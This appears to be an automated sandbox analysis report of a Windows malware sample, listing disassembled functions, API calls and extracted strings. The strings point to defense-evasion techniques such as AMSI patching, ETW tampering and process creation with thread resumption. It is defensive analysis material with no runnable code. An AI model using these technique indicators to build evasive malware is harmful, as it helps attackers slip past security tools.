                                        control_flow_graph 5348 2b57878-2b57c67 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b34898 5463 2b58af1-2b58c74 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b34898 5348->5463 5464 2b57c6d-2b57e40 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b34798 call 2b3494c call 2b34d20 call 2b34d9c CreateProcessAsUserW 5348->5464 5553 2b59420-2b5aa25 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 * 16 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b346a4 * 2 call 2b48824 call 2b47b98 call 2b4818c call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 ExitProcess 5463->5553 5554 2b58c7a-2b58c89 call 2b34898 5463->5554 5572 2b57e42-2b57eb9 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 5464->5572 5573 2b57ebe-2b57fc9 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 5464->5573 5554->5553 5564 2b58c8f-2b58f62 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b4e540 call 2b3480c call 2b3494c call 2b346a4 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b37e18 5554->5564 5822 2b58f68-2b59215 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b34d8c * 2 call 2b34734 call 2b4dacc 5564->5822 5823 2b5921a-2b5941b call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b349a4 call 2b48bb0 5564->5823 5572->5573 5672 2b57fd0-2b582f0 call 2b349a4 call 2b4dc90 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b4cfa4 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 5573->5672 5673 2b57fcb-2b57fce 5573->5673 5991 2b582f2-2b58304 call 2b48584 5672->5991 5992 2b58309-2b58aec call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 ResumeThread call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 CloseHandle call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b47ed4 call 2b487a0 * 6 CloseHandle call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 5672->5992 5673->5672 5822->5823 5823->5553 5991->5992 5992->5463
                                        APIs
                                          • Part of subcall function 02B48824: LoadLibraryA.KERNEL32(00000000,00000000,02B4890B), ref: 02B48858
                                          • Part of subcall function 02B48824: FreeLibrary.KERNEL32(74FA0000,00000000,02B91388,Function_000065D8,00000004,02B91398,02B91388,05F5E0FF,00000040,02B9139C,74FA0000,00000000,00000000,00000000,00000000,02B4890B), ref: 02B488EB
                                        • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02C857DC,02C85820,OpenSession,02B9137C,02B5AFD8,UacScan,02B9137C), ref: 02B57E39
                                        • ResumeThread.KERNEL32(00000000,ScanBuffer,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,UacScan,02B9137C,02B5AFD8,ScanBuffer,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8), ref: 02B58483
                                        • CloseHandle.KERNEL32(00000000,ScanBuffer,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,UacScan,02B9137C,02B5AFD8,00000000,ScanBuffer,02B9137C,02B5AFD8,OpenSession,02B9137C), ref: 02B58602
                                          • Part of subcall function 02B487A0: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02B913A4,02B4A3C7,ScanString,02B913A4,02B4A77C,ScanBuffer,02B913A4,02B4A77C,Initialize,02B913A4,02B4A77C,UacScan), ref: 02B487B4
                                          • Part of subcall function 02B487A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B487CE
                                          • Part of subcall function 02B487A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02B913A4,02B4A3C7,ScanString,02B913A4,02B4A77C,ScanBuffer,02B913A4,02B4A77C,Initialize), ref: 02B4880A
                                        • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02B9137C,02B5AFD8,UacInitialize,02B9137C,02B5AFD8,ScanBuffer,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,UacScan,02B9137C), ref: 02B589F4
                                          • Part of subcall function 02B37E18: GetFileAttributesA.KERNEL32(00000000,?,02B4F8CC,ScanString,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,ScanString,02B9137C,02B5AFD8,UacScan,02B9137C,02B5AFD8,UacInitialize), ref: 02B37E23
                                          • Part of subcall function 02B4DACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B4DB9E), ref: 02B4DB0B
                                          • Part of subcall function 02B4DACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B4DB45
                                          • Part of subcall function 02B4DACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B4DB72
                                          • Part of subcall function 02B4DACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B4DB7B
                                          • Part of subcall function 02B4818C: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B48216), ref: 02B481F8
                                        • ExitProcess.KERNEL32(00000000,OpenSession,02B9137C,02B5AFD8,ScanBuffer,02B9137C,02B5AFD8,Initialize,02B9137C,02B5AFD8,00000000,00000000,00000000,ScanString,02B9137C,02B5AFD8), ref: 02B5AA25
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Library$CloseFile$CreateFreeHandleLoadProcess$AddressAttributesCacheExitFlushInstructionProcResumeThreadUserWrite
                                        • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                        • API String ID: 1548959583-1225450241
                                        • Opcode ID: c98bd8f3fcbddab39530cc8e05dab42046ffec65bd06b86d075a4c65d39ddf07
                                        • Instruction ID: 69db2bb1f34aa02231497eb6c3dd375420343870eb729634c284c33a12196f48
                                        • Opcode Fuzzy Hash: c98bd8f3fcbddab39530cc8e05dab42046ffec65bd06b86d075a4c65d39ddf07
                                        • Instruction Fuzzy Hash: 77431CB6A501688FDB16EB64DD80ADE73B6FF88300F1045E6E509EB254DA30EE85CF51
                                        Function 02B31724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 9638 2b31724-2b31736 9639 2b31968-2b3196d 9638->9639 9640 2b3173c-2b3174c 9638->9640 9643 2b31973-2b31984 9639->9643 9644 2b31a80-2b31a83 9639->9644 9641 2b317a4-2b317ad 9640->9641 9642 2b3174e-2b3175b 9640->9642 9641->9642 9649 2b317af-2b317bb 9641->9649 9645 2b31774-2b31780 9642->9645 9646 2b3175d-2b3176a 9642->9646 9647 2b31986-2b319a2 9643->9647 9648 2b31938-2b31945 9643->9648 9650 2b31684-2b316ad VirtualAlloc 9644->9650 9651 2b31a89-2b31a8b 9644->9651 9655 2b31782-2b31790 9645->9655 9656 2b317f0-2b317f9 9645->9656 9652 2b31794-2b317a1 9646->9652 9653 2b3176c-2b31770 9646->9653 9657 2b319b0-2b319bf 9647->9657 9658 2b319a4-2b319ac 9647->9658 9648->9647 9654 2b31947-2b3195b Sleep 9648->9654 9649->9642 9659 2b317bd-2b317c9 9649->9659 9660 2b316df-2b316e5 9650->9660 9661 2b316af-2b316dc call 2b31644 9650->9661 9654->9647 9662 2b3195d-2b31964 Sleep 9654->9662 9668 2b317fb-2b31808 9656->9668 9669 2b3182c-2b31836 9656->9669 9664 2b319c1-2b319d5 9657->9664 9665 2b319d8-2b319e0 9657->9665 9663 2b31a0c-2b31a22 9658->9663 9659->9642 9666 2b317cb-2b317de Sleep 9659->9666 9661->9660 9662->9648 9670 2b31a24-2b31a32 9663->9670 9671 2b31a3b-2b31a47 9663->9671 9664->9663 9676 2b319e2-2b319fa 9665->9676 9677 2b319fc-2b319fe call 2b315cc 9665->9677 9666->9642 9674 2b317e4-2b317eb Sleep 9666->9674 9668->9669 9678 2b3180a-2b3181e Sleep 9668->9678 9672 2b318a8-2b318b4 9669->9672 9673 2b31838-2b31863 9669->9673 9670->9671 9679 2b31a34 9670->9679 9682 2b31a49-2b31a5c 9671->9682 9683 2b31a68 9671->9683 9684 2b318b6-2b318c8 9672->9684 9685 2b318dc-2b318eb call 2b315cc 9672->9685 9680 2b31865-2b31873 9673->9680 9681 2b3187c-2b3188a 9673->9681 9674->9641 9686 2b31a03-2b31a0b 9676->9686 9677->9686 9678->9669 9688 2b31820-2b31827 Sleep 9678->9688 9679->9671 9680->9681 9689 2b31875 9680->9689 9690 2b318f8 9681->9690 9691 2b3188c-2b318a6 call 2b31500 9681->9691 9692 2b31a5e-2b31a63 call 2b31500 9682->9692 9693 2b31a6d-2b31a7f 9682->9693 9683->9693 9694 2b318ca 9684->9694 9695 2b318cc-2b318da 9684->9695 9697 2b318fd-2b31936 9685->9697 9703 2b318ed-2b318f7 9685->9703 9688->9668 9689->9681 9690->9697 9691->9697 9692->9693 9694->9695 9695->9697
                                        APIs
                                        • Sleep.KERNEL32(00000000,?,02B32000), ref: 02B317D0
                                        • Sleep.KERNEL32(0000000A,00000000,?,02B32000), ref: 02B317E6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 249fb98fb7141ddc012c85284082e7c2480c0228c53b860c1461fb51bbe0f35e
                                        • Instruction ID: 4a15fe2087937dd63cc40c78f75d4fc812e8be0f4b58a7c3419ef8c1b0586442
                                        • Opcode Fuzzy Hash: 249fb98fb7141ddc012c85284082e7c2480c0228c53b860c1461fb51bbe0f35e
                                        • Instruction Fuzzy Hash: A5B15576A203418BEB16CF2CD880355BBE9FB85364F0886EEE55E8B385C770E451CB90
                                        Function 02B4870C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • LoadLibraryW.KERNEL32(amsi), ref: 02B48715
                                          • Part of subcall function 02B480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B48150,?,?,00000000,00000000,?,02B48069,00000000,KernelBASE,00000000,00000000,02B48090), ref: 02B48115
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B4811B
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(?,?), ref: 02B4812D
                                          • Part of subcall function 02B47D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B47D74
                                        • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B48774
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                        • String ID: DllGetClassObject$W$amsi
                                        • API String ID: 941070894-2671292670
                                        • Opcode ID: 0ac4e86d76097c5376c62ff273848e35a854f8fd3358ce432a17273745a894cd
                                        • Instruction ID: 047837b1fb477bda28bdbcf2b363dbbc7d5968b86ab84bc2ee0fd23571a4496e
                                        • Opcode Fuzzy Hash: 0ac4e86d76097c5376c62ff273848e35a854f8fd3358ce432a17273745a894cd
                                        • Instruction Fuzzy Hash: FAF0A46110C38179E201E6748C85F4FBFCD4B52224F048A9DF1E8562D2DA75D104ABB7
                                        Function 02B31A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 9726 2b31a8c-2b31a9b 9727 2b31aa1-2b31aa5 9726->9727 9728 2b31b6c-2b31b6f 9726->9728 9731 2b31aa7-2b31aae 9727->9731 9732 2b31b08-2b31b11 9727->9732 9729 2b31b75-2b31b7f 9728->9729 9730 2b31c5c-2b31c60 9728->9730 9734 2b31b81-2b31b8d 9729->9734 9735 2b31b3c-2b31b49 9729->9735 9738 2b31c66-2b31c6b 9730->9738 9739 2b316e8-2b3170b call 2b31644 VirtualFree 9730->9739 9736 2b31ab0-2b31abb 9731->9736 9737 2b31adc-2b31ade 9731->9737 9732->9731 9733 2b31b13-2b31b27 Sleep 9732->9733 9733->9731 9740 2b31b2d-2b31b38 Sleep 9733->9740 9742 2b31bc4-2b31bd2 9734->9742 9743 2b31b8f-2b31b92 9734->9743 9735->9734 9741 2b31b4b-2b31b5f Sleep 9735->9741 9744 2b31ac4-2b31ad9 9736->9744 9745 2b31abd-2b31ac2 9736->9745 9746 2b31af3 9737->9746 9747 2b31ae0-2b31af1 9737->9747 9755 2b31716 9739->9755 9756 2b3170d-2b31714 9739->9756 9740->9732 9741->9734 9750 2b31b61-2b31b68 Sleep 9741->9750 9751 2b31b96-2b31b9a 9742->9751 9753 2b31bd4-2b31bd9 call 2b314c0 9742->9753 9743->9751 9752 2b31af6-2b31b03 9746->9752 9747->9746 9747->9752 9750->9735 9757 2b31bdc-2b31be9 9751->9757 9758 2b31b9c-2b31ba2 9751->9758 9752->9729 9753->9751 9760 2b31719-2b31723 9755->9760 9756->9760 9757->9758 9761 2b31beb-2b31bf2 call 2b314c0 9757->9761 9762 2b31bf4-2b31bfe 9758->9762 9763 2b31ba4-2b31bc2 call 2b31500 9758->9763 9761->9758 9765 2b31c00-2b31c28 VirtualFree 9762->9765 9766 2b31c2c-2b31c59 call 2b31560 9762->9766
                                        APIs
                                        • Sleep.KERNEL32(00000000,?,?,00000000,02B31FE4), ref: 02B31B17
                                        • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02B31FE4), ref: 02B31B31
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 54c1fbc5757ae58e29e506e5d3460af84105410bcc35fac673cb4331f7cc1d17
                                        • Instruction ID: 98a80c09975176e242ccbc08925cafd6c45ff120486a5e1b4f02964fceef1bfe
                                        • Opcode Fuzzy Hash: 54c1fbc5757ae58e29e506e5d3460af84105410bcc35fac673cb4331f7cc1d17
                                        • Instruction Fuzzy Hash: 2751AE756212408FEB16CF6CC9847A6BBD8EF45324F1885EEE54DCB282E770D845CBA1
                                        Function 02B4E2F6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B4E436
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: CheckConnectionInternet
                                        • String ID: Initialize$OpenSession$ScanBuffer
                                        • API String ID: 3847983778-3852638603
                                        • Opcode ID: eac469f51af5eb1fb6cf3f56115eb1897e807f397025970f8ecd5bff98624696
                                        • Instruction ID: 8459008793e9ced45e4c333ca2b7233c233fce72e9d5b05da8946fb690ca4644
